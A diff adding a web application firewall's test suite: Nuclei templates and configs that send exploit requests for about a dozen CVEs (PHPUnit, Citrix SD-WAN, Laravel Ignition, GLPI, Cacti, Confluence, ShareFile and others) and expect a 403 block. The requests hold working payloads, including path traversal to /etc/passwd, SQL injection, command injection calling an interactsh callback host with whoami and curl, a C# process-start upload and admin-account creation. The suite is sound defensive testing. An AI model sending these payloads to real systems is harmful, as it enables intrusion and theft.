Application Security Engine support

.appsec-tests/CVE-2017-9841/CVE-2017-9841.yaml

@@ -0,0 +1,22 @@
+id: CVE-2017-9841
+info:
+  name: CVE-2017-9841
+  author: crowdsec
+  severity: info
+  description: CVE-2017-9841 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: text/html
+
+      <?php echo md5(phpunit_rce);?>
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403

.appsec-tests/CVE-2017-9841/config.yaml

@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml
+nuclei_template: CVE-2017-9841.yaml

.appsec-tests/CVE-2019-12989/CVE-2019-12989.yaml

@@ -0,0 +1,24 @@
+id: CVE-2019-12989
+info:
+  name: CVE-2019-12989
+  author: crowdsec
+  severity: info
+  description: CVE-2019-12989 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1
+      Host: {{Hostname}}
+      SSL_CLIENT_VERIFY: SUCCESS
+      Content-Type: application/json
+      Content-Length: 178
+
+      {"get_package_file": {"site_name": "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_01234';#","appliance_type": "primary","package_type": "active"}}
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403

.appsec-tests/CVE-2019-12989/config.yaml

@@ -0,0 +1,4 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml
+nuclei_template: CVE-2019-12989.yaml

.appsec-tests/CVE-2020-11738/CVE-2020-11738.yaml

@@ -0,0 +1,20 @@
+id: CVE-2020-11738
+info:
+  name: CVE-2020-11738
+  author: crowdsec
+  severity: info
+  description: CVE-2020-11738 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+      Host: {{Hostname}}
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403

.appsec-tests/CVE-2020-11738/config.yaml

@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml
+nuclei_template: CVE-2020-11738.yaml

.appsec-tests/CVE-2021-22941/CVE-2021-22941.yaml

@@ -0,0 +1,31 @@
+id: CVE-2021-22941
+info:
+  name: CVE-2021-22941
+  author: crowdsec
+  severity: info
+  description: CVE-2021-22941 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      POST /upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123 HTTP/1.1
+      Host: 127.0.0.1:4241
+      User-Agent: python-requests/2.28.2
+      Accept-Encoding: gzip, deflate, br
+      Accept: */*
+      Connection: keep-alive
+      Content-Type: multipart/form-data; boundary=boundary
+      Content-Length: 104
+
+      --boundary
+      Content-Disposition: form-data; name="text4"; filename="text5"
+
+      V8C7BH6OHT
+      --boundary--
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403

.appsec-tests/CVE-2021-22941/config.yaml

@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml
+nuclei_template: CVE-2021-22941.yaml

.appsec-tests/CVE-2021-3129/CVE-2021-3129.yaml

@@ -0,0 +1,30 @@
+id: CVE-2021-3129
+info:
+  name: CVE-2021-3129
+  author: crowdsec
+  severity: info
+  description: CVE-2021-3129 testing
+  tags: appsec-testing
+http:
+  - raw:
+      - |
+        POST /_ignition/execute-solution HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        Content-Type: application/json
+
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
+      - |
+        POST /_ignition/execute-solution HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        Content-Type: application/json
+
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403

.appsec-tests/CVE-2021-3129/config.yaml

@@ -0,0 +1,4 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml
+nuclei_template: CVE-2021-3129.yaml

.appsec-tests/CVE-2022-27926/CVE-2022-27926.yaml

@@ -0,0 +1,19 @@
+id: CVE-2022-27926
+
+info:
+  name: Zimbra Collaboration (ZCS) - Cross Site Scripting
+  author: rootxharsh,iamnoooob,pdresearch
+  severity: medium
+  description: |
+    A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 403

.appsec-tests/CVE-2022-27926/config.yaml

@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml
+nuclei_template: CVE-2022-27926.yaml

.appsec-tests/CVE-2022-35914/CVE-2022-35914.yaml

@@ -0,0 +1,26 @@
+id: CVE-2022-35914
+
+info:
+  name: GLPI <=10.0.2 - Remote Command Execution
+  author: For3stCo1d
+  severity: critical
+  description: |
+    GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
+variables:
+  cmd: "cat+/etc/passwd"
+
+http:
+  - raw:
+      - |
+        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: sid=foo
+
+        sid=foo&hhook=exec&text={{cmd}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 403

.appsec-tests/CVE-2022-35914/config.yaml

@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml
+nuclei_template: CVE-2022-35914.yaml

.appsec-tests/CVE-2022-44877/CVE-2022-44877.yaml

@@ -0,0 +1,22 @@
+id: CVE-2022-44877
+info:
+  name: CVE-2022-44877
+  author: crowdsec
+  severity: info
+  description: CVE-2022-44877 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      username=root&password=toor&commit=Login
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403

.appsec-tests/CVE-2022-44877/config.yaml

@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml
+nuclei_template: CVE-2022-44877.yaml

.appsec-tests/CVE-2022-46169/CVE-2022-46169.yaml

@@ -0,0 +1,23 @@
+id: CVE-2022-46169
+
+info:
+  name: Cacti <=1.2.22 - Remote Command Injection
+  author: Hardik-Solanki,j4vaovo
+  severity: critical
+  description: |
+    Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+variables:
+  useragent: '{{rand_base(6)}}'
+
+http:
+  - raw:
+      - |
+        GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=%3Bcurl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'%3B HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-For: 127.0.0.1
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 403

.appsec-tests/CVE-2022-46169/config.yaml

@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml
+nuclei_template: CVE-2022-46169.yaml

.appsec-tests/CVE-2023-20198/CVE-2023-20198.yaml

@@ -0,0 +1,39 @@
+id: CVE-2023-20198
+info:
+  name: CVE-2023-20198
+  author: crowdsec
+  severity: info
+  description: CVE-2023-20198 testing
+  tags: appsec-testing
+http:
+  - raw:
+    - |
+      POST /%2577ebui_wsma_https HTTP/1.1
+      Host: {{Hostname}}
+
+      <?xml version="1.0"?>
+      <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+        <SOAP:Header>
+          <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
+            <wsse:UsernameToken SOAP:mustUnderstand="false">
+              <wsse:Username>#{username}</wsse:Username>
+              <wsse:Password>*****</wsse:Password>
+            </wsse:UsernameToken>
+          </wsse:Security>
+        </SOAP:Header>
+        <SOAP:Body>
+          <request correlator="xxx" xmlns="urn:cisco:wsma-config">
+            <configApply details="all" action-on-fail="continue">
+              <config-data>
+              <cli-config-data-block><![xxx]]></cli-config-data-block>
+              </config-data>
+            </configApply>
+          </request>
+        </SOAP:Body>
+      </SOAP:Envelope>
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403

.appsec-tests/CVE-2023-20198/config.yaml

@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml
+nuclei_template: CVE-2023-20198.yaml

.appsec-tests/CVE-2023-22515/CVE-2023-22515.yaml

@@ -0,0 +1,28 @@
+id: CVE-2023-22515
+info:
+  name: Atlassian Confluence - Privilege Escalation
+  severity: critical
+  author: crowdsec
+  description: |
+    Atlassian Confluence Data Center and Server contains a privilege escalation vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.
+variables:
+  username: "{{rand_base(10)}}"
+  password: "{{rand_base(10)}}"
+  email: "{{username}}@{{password}}"
+
+http:
+  - raw:
+      - |
+        @timeout:20s
+        POST /setup/setupadministrator.action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Atlassian-Token: no-check
+
+        username={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next
+    cookie-reuse: true
+    redirects: true
+    matchers:
+      - type: status
+        status:
+          - 403

.appsec-tests/CVE-2023-22515/config.yaml

@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml
+nuclei_template: CVE-2023-22515.yaml

.appsec-tests/CVE-2023-24489/CVE-2023-24489.yaml

@@ -0,0 +1,31 @@
+id: CVE-2023-24489
+info:
+  name: CVE-2023-24489
+  author: crowdsec
+  severity: info
+  description: CVE-2023-24489 testing
+  tags: appsec-testing
+variables:
+  fileName: '{{rand_base(8)}}'
+  #in real life padding varies to abuse the crypto bug
+  padding: 'QUFBQUFBQUFBQUFBQUFBAEFBQUFBQUFBQUFBQUFBQUE='
+http:
+  - raw:
+      - |
+        POST /documentum/upload.aspx?parentid={{padding}}&raw=1&unzip=on&uploadid={{fileName}}\..\..\..\cifs&filename={{fileName}}.aspx HTTP/1.1
+        Host: {{Hostname}}
+
+        <%@ Page Language="C#" Debug="true" Trace="false" %>
+        <script Language="c#" runat="server">
+        void Page_Load(object sender, EventArgs e)
+        {
+            Response.Write("{{randstr}}");
+        }
+        </script>
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403

.appsec-tests/CVE-2023-24489/config.yaml

@@ -0,0 +1,4 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml
+nuclei_template: CVE-2023-24489.yaml